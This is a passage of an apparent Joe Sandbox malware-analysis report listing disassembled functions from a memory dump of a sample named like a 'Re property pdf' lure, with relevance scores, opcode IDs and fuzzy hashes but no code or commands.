                                                                                                                              Function 0107CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryName
                                                                                                                              • API String ID: 0-215506332
                                                                                                                              • Opcode ID: 328815822ee4dd30cee4690cc5aa5e3bac7ba1b6a8800c8320121baa50bb99aa
                                                                                                                              • Instruction ID: 867e3908dfffcd9b878a94eca7cdc0529c785569bc051c9487c2f970b37dacbe
                                                                                                                              • Opcode Fuzzy Hash: 328815822ee4dd30cee4690cc5aa5e3bac7ba1b6a8800c8320121baa50bb99aa
                                                                                                                              • Instruction Fuzzy Hash: 2C310176D0051AAFFB16DA59CA41EBFBBB4EB80720F114169B941AB250D7309E00DBE4
                                                                                                                              Function 0108892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0108895E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                              • API String ID: 0-702105204
                                                                                                                              • Opcode ID: f8528d53a8176c51c857fc001417a168704761aecf9438582b7ef25a6818bbc2
                                                                                                                              • Instruction ID: b7129aa54928b075fdee72e574bf2254238b0523abc997084033eb4236a61b1f
                                                                                                                              • Opcode Fuzzy Hash: f8528d53a8176c51c857fc001417a168704761aecf9438582b7ef25a6818bbc2
                                                                                                                              • Instruction Fuzzy Hash: 360126362082119BE675BF59CC85FAA7FA5EF82394F4C016EF7C116953CF25A840C792
                                                                                                                              Function 010A2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5ee3b921622d931a5935737564e2e031e0c8752010f9c67423ce787f8443f33b
                                                                                                                              • Instruction ID: fb1f9270bcb6135a66a82c95851bdde0b0f2a1ec846100ac3bd3735ba1f47466
                                                                                                                              • Opcode Fuzzy Hash: 5ee3b921622d931a5935737564e2e031e0c8752010f9c67423ce787f8443f33b
                                                                                                                              • Instruction Fuzzy Hash: 0442D0766083419BE765CFA8C890A6FBBE5BF88300F88497DFAC287250D771D945CB52
                                                                                                                              Function 01098158 Relevance: .6, Instructions: 617COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 415aee6a473bb710fdc2538f6dff3c6ea0d29ec4e8e8f1e12c3b56496457e02f
                                                                                                                              • Instruction ID: ef7e5ad00f14965f73569769d6a21b2eee2f0dc9c12a1feefba4e369efddd971
                                                                                                                              • Opcode Fuzzy Hash: 415aee6a473bb710fdc2538f6dff3c6ea0d29ec4e8e8f1e12c3b56496457e02f
                                                                                                                              • Instruction Fuzzy Hash: E0423B75A002198FEF64CF69C891BADBBF5BF49300F14C09AE989AB341D7349985DF50
                                                                                                                              Function 01012840 Relevance: .6, Instructions: 605COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 760b18b0d8d6f72661d78e80c5ccd5d5a0efcda15ad7038c591b111f22d45e13
                                                                                                                              • Instruction ID: 329c6bb33b69f812760f1449a8553c1ab400eb04aa6d0f9d8c766d59a341fecd
                                                                                                                              • Opcode Fuzzy Hash: 760b18b0d8d6f72661d78e80c5ccd5d5a0efcda15ad7038c591b111f22d45e13
                                                                                                                              • Instruction Fuzzy Hash: EF32F170A007558FDB65CF69C8447BEBBFABF84304F24815DE4C69B685DB3AA842CB50
                                                                                                                              Function 010AA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1ddc05b01e175449ba36715a076e33609e6a1602daeb330e20dda1eaf8a3f2c
                                                                                                                              • Instruction ID: 7fb4bec4b22eb1e2ec9d7405a852a16d5d969187f61438c740a186fc1f6346ad
                                                                                                                              • Opcode Fuzzy Hash: f1ddc05b01e175449ba36715a076e33609e6a1602daeb330e20dda1eaf8a3f2c
                                                                                                                              • Instruction Fuzzy Hash: 59229D70704661CBEB65CFADC45437ABBE1AF48340F88849AE9C68F2C6D735E452DB60
                                                                                                                              Function 01006A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ab25789ed6645b5b51fc79f2ef4ed97ca33b0b8fa975335032b5d8e914e1bed9
                                                                                                                              • Instruction ID: 8aa3ee69f72139d230048743335369f0157b5fe00707bec99db2ec777df7e3f9
                                                                                                                              • Opcode Fuzzy Hash: ab25789ed6645b5b51fc79f2ef4ed97ca33b0b8fa975335032b5d8e914e1bed9
                                                                                                                              • Instruction Fuzzy Hash: D532B370A00615CFEB66CF68C480BAEB7F6FF88300F1485A9E9959B391DB35E851CB50
                                                                                                                              Function 01024A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                              • Instruction ID: d86c8801405f7a7a39c5a4749b891ca9933f9b9217194af5d8cbda97f3f96b19
                                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                              • Instruction Fuzzy Hash: 13F17F71E0022A9FDB55DF99C990BEEBBF9BF48710F048169E985EB240E774D841CB60
                                                                                                                              Function 0109892B Relevance: .4, Instructions: 386COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4f7a5d04f9da8f606b8b4d84c39e21d7656bfb0fb84e2b8054ff4793693d6cc
                                                                                                                              • Instruction ID: e454cbdd1da720155e07027bad54f2b7738f07360759442aec45be409a269a4d
                                                                                                                              • Opcode Fuzzy Hash: a4f7a5d04f9da8f606b8b4d84c39e21d7656bfb0fb84e2b8054ff4793693d6cc
                                                                                                                              • Instruction Fuzzy Hash: 32D1E271A0060E9BDF05CF69C861AFEB7F1AF89304F18C16AD595A7341E739E901DB60
                                                                                                                              Function 010065D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 708d4475c7e9dc1ab7f3ca90b6b5f5f305e5c9f577d31902040073e3c79bc6b9
                                                                                                                              • Instruction ID: 27eef4e00615e11598d2f2685567e4a8c52654a271f13e0dfea26dad5498bf54
                                                                                                                              • Opcode Fuzzy Hash: 708d4475c7e9dc1ab7f3ca90b6b5f5f305e5c9f577d31902040073e3c79bc6b9
                                                                                                                              • Instruction Fuzzy Hash: E2E1A171508341CFD716CF28C490A6ABBE5FF89314F048A6DE9D98B391DB32E915CB92
                                                                                                                              Function 00FF8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 71ad6be3ec34e82e0ffaed6926f446cad1b44ca24ffb6be7b23b91d5e1aa94b3
                                                                                                                              • Instruction ID: 2e62ae360810a1c434c25d0fab05566e2485d1c2cd05eebfbe82d69894d93ddf
                                                                                                                              • Opcode Fuzzy Hash: 71ad6be3ec34e82e0ffaed6926f446cad1b44ca24ffb6be7b23b91d5e1aa94b3
                                                                                                                              • Instruction Fuzzy Hash: 46D1F372A0020A9BCB14DF64C881BBB77E5BF44354F144529FA52DB2A1EB34E942DB60
                                                                                                                              Function 01088243 Relevance: .3, Instructions: 322COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction ID: 4bc16c5be91f82c1b6763b9fb574f768d42844e614762673b23792e88dc8d77f
                                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction Fuzzy Hash: B1B17474A046099FDF64EF59C940AABBBF9BF84304F90845EAAC297791DA34E905CB10
                                                                                                                              Function 01010535 Relevance: .3, Instructions: 300COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction ID: 98382b2504c64ef9bdc80208ec93ff8d898c76b5bdc1df14797163f28e41ef29
                                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction Fuzzy Hash: 2EB1E7316006469FDB15DBA8C890BBFBBFAAF48304F140595E6D2DB289D734D981DB90
                                                                                                                              Function 010083C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d4fff823bdb8efd4a03d881737ed402001bb1001b35950c6dcc9694f140e2aa
                                                                                                                              • Instruction ID: 127f09d5af9d048ced3e9436a62ac418e1a1bba01848cf7e1cd1bcfa2bb80312
                                                                                                                              • Opcode Fuzzy Hash: 0d4fff823bdb8efd4a03d881737ed402001bb1001b35950c6dcc9694f140e2aa
                                                                                                                              • Instruction Fuzzy Hash: 63C168705083418FE765CF18C494BABB7E9BF88304F44896EE9C987291DB75E909CF92
                                                                                                                              Function 00FFC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 16aa87341139eb52a930c8dd15d389171b9871c7e87094294871f491c9ea89e3
                                                                                                                              • Instruction ID: 97329ef37a7aac48bfd643fd2af5f99fd4a6491e113ee69778e3b0c966c036ee
                                                                                                                              • Opcode Fuzzy Hash: 16aa87341139eb52a930c8dd15d389171b9871c7e87094294871f491c9ea89e3
                                                                                                                              • Instruction Fuzzy Hash: 25B19170A0026D8BDB64CF54C980BB9B3F1EF44710F1885E9D94AE7291EB34AD85DB60
                                                                                                                              Function 0102E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 715aa1733557fbc9e74454d95fb44028601ed774a802aff430c3d5718b631733
                                                                                                                              • Instruction ID: 6120d8ab2824bc8f3a38748be2938a51be78ab0033e8a510031d34a8d976efb8
                                                                                                                              • Opcode Fuzzy Hash: 715aa1733557fbc9e74454d95fb44028601ed774a802aff430c3d5718b631733
                                                                                                                              • Instruction Fuzzy Hash: 6CA14A31E4062A9FEB31DB58D958BAE7BE8BF04754F0401A5EAC0AB281C7749C40CB91
                                                                                                                              Function 01040185 Relevance: .3, Instructions: 276COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 67d6aa4819cb7111db5d1ca962ff4c89c7510be578458338c8ba5a23ff540296
                                                                                                                              • Instruction ID: ee098c718968c46ed898855786cfba40d2e9748d7118a6956b17a7cf61cc1f52
                                                                                                                              • Opcode Fuzzy Hash: 67d6aa4819cb7111db5d1ca962ff4c89c7510be578458338c8ba5a23ff540296
                                                                                                                              • Instruction Fuzzy Hash: E7A1AFB0B0061A9BDB25DF69C9D0BEAB7F5FF44314F004179EB85AB285DB34A851CB90
                                                                                                                              Function 010D4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4d0a01b6ec4f201845326da8b5c5a951d171d92961ba04f734fa3c5c16c0d149
                                                                                                                              • Instruction ID: a1aaf693964222f8f9ca969784a8599a11d1bfc25b19acc3b903ae839b526033
                                                                                                                              • Opcode Fuzzy Hash: 4d0a01b6ec4f201845326da8b5c5a951d171d92961ba04f734fa3c5c16c0d149
                                                                                                                              • Instruction Fuzzy Hash: A4A1CA72A00712AFC722DF18C981BAABBE9FF48344F45056CE5C9DBA55D738E801CB91
                                                                                                                              Function 010D2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                              • Instruction ID: 434d5c0cae86f75b22fc3249c5c6d1db2217f2fc622844d3ceaaeefb898c87fe
                                                                                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                              • Instruction Fuzzy Hash: 85B15771E0061ADFDF69DFA9C880AADBBF5FF48310F148169E994AB354D730A941CB90
                                                                                                                              Function 010860E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 80b60601e67bcb397e8825124da3fced387da76db0a52f7e2190df1eb12326ac
                                                                                                                              • Instruction ID: 49867151519dfec2a3ccd9dad02be8d3eb3ded280de0ce134ab40b4816024eb4
                                                                                                                              • Opcode Fuzzy Hash: 80b60601e67bcb397e8825124da3fced387da76db0a52f7e2190df1eb12326ac
                                                                                                                              • Instruction Fuzzy Hash: 0D91C471D04615AFDF15DFA8D884BAEBFF5AF48310F164199E6C0AB341D776D9008BA0
                                                                                                                              Function 0101E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b5a99ba36181a9a42a022d12d4311595dc7483259cb8195dfe0ebd62d020d53
                                                                                                                              • Instruction ID: 19a8cc5e139af113a98414b74deffbdca78bd2adf31e3627bacd54580ffeb9e6
                                                                                                                              • Opcode Fuzzy Hash: 7b5a99ba36181a9a42a022d12d4311595dc7483259cb8195dfe0ebd62d020d53
                                                                                                                              • Instruction Fuzzy Hash: C1914531A00612CFEB26DB5CC440BBEBBE5EF84714F1540A9EDC59B688EB39D941C7A1
                                                                                                                              Function 010CAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction ID: b982a6617feb24e4018369fd5a2c6e14c27f7ad6f11b97996ef4b6cdcda12686
                                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction Fuzzy Hash: B2815E31B00209DFDB59DF98C880AAEBBF6AF84710B18856DD9569B345EA34E901CF50
                                                                                                                              Function 0103E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9b78b4ff5d19a00ac4b3c646587206d71f26d2b3fd9c5b7d631afdd9e7e9e4f6
                                                                                                                              • Instruction ID: 4301155f6b4dd84c26ed0eb1adcc9115485b3e4a3eec0b627c3eafa5c66fda98
                                                                                                                              • Opcode Fuzzy Hash: 9b78b4ff5d19a00ac4b3c646587206d71f26d2b3fd9c5b7d631afdd9e7e9e4f6
                                                                                                                              • Instruction Fuzzy Hash: D3817471A00609EFDB65CFA9C880BEEBBF9FF88354F148529E595A7250D730AC45CB60
                                                                                                                              Function 0101C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2d764da4bbe229d6cf1ec43849ffd7fa4f01b39561c45c697d8371429df092e7
                                                                                                                              • Instruction ID: c27736c6d156cf1b8dbac2a965fcc44ee8e07d2603fd038c44290c4a678e952b
                                                                                                                              • Opcode Fuzzy Hash: 2d764da4bbe229d6cf1ec43849ffd7fa4f01b39561c45c697d8371429df092e7
                                                                                                                              • Instruction Fuzzy Hash: 8471DF75C04225DFDB258F58D9907BEBBF4FF58710F14815AE982AB354D3799800CBA0
                                                                                                                              Function 010B47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ebd8666a7710e45949ad7c7d51d9d869867c0a0cb3e083d3a0d02f6fd8a14117
                                                                                                                              • Instruction ID: e1b05d167e7416c2dd3d93ac8f7edd499c5f9f5cb189b3db870f89feff38160b
                                                                                                                              • Opcode Fuzzy Hash: ebd8666a7710e45949ad7c7d51d9d869867c0a0cb3e083d3a0d02f6fd8a14117
                                                                                                                              • Instruction Fuzzy Hash: 6C718270D00205EFDB20DFA9D981ADABBF8EF94300B11419EE6D1E769AC7369A40CB54
                                                                                                                              Function 0101260B Relevance: .2, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 005ab1d90c54bd15e5e1864127ffdcd2ddf824ee046a1173b727a3a89d8ae7ad
                                                                                                                              • Instruction ID: b562b6af808b0409a35a3a12eb39ef5b2b84a41ffa0a1284d421fb909e79539e
                                                                                                                              • Opcode Fuzzy Hash: 005ab1d90c54bd15e5e1864127ffdcd2ddf824ee046a1173b727a3a89d8ae7ad
                                                                                                                              • Instruction Fuzzy Hash: E271C1716046428FD356DF28C480B6AB7E5FF88310F1485A9E8D9CB39ADB38DC45CB91
                                                                                                                              Function 0108035C Relevance: .2, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction ID: 23480cbcdf9ab942be5c515ba56f7652ae479f9b230a696830a5205b3cf75e71
                                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction Fuzzy Hash: F2718071A00619EFCB10EFA9C984EDEBBB9FF48310F104569E585AB254DB34EA05CB60
                                                                                                                              Function 010962A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 25bebdc50f0c2bb024012bbbf66af8971d1cedaa1f3cf6cbc094c14857260689
                                                                                                                              • Instruction ID: 85d9ab6ed8833f477839c110789de181e1642b4aa08e056c0e6fd84b3ad20bd5
                                                                                                                              • Opcode Fuzzy Hash: 25bebdc50f0c2bb024012bbbf66af8971d1cedaa1f3cf6cbc094c14857260689
                                                                                                                              • Instruction Fuzzy Hash: D4710671200B01AFEB329F58C864F5ABBE6FF44760F148468E2D58B2E0DB76E844DB50
                                                                                                                              Function 01008AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
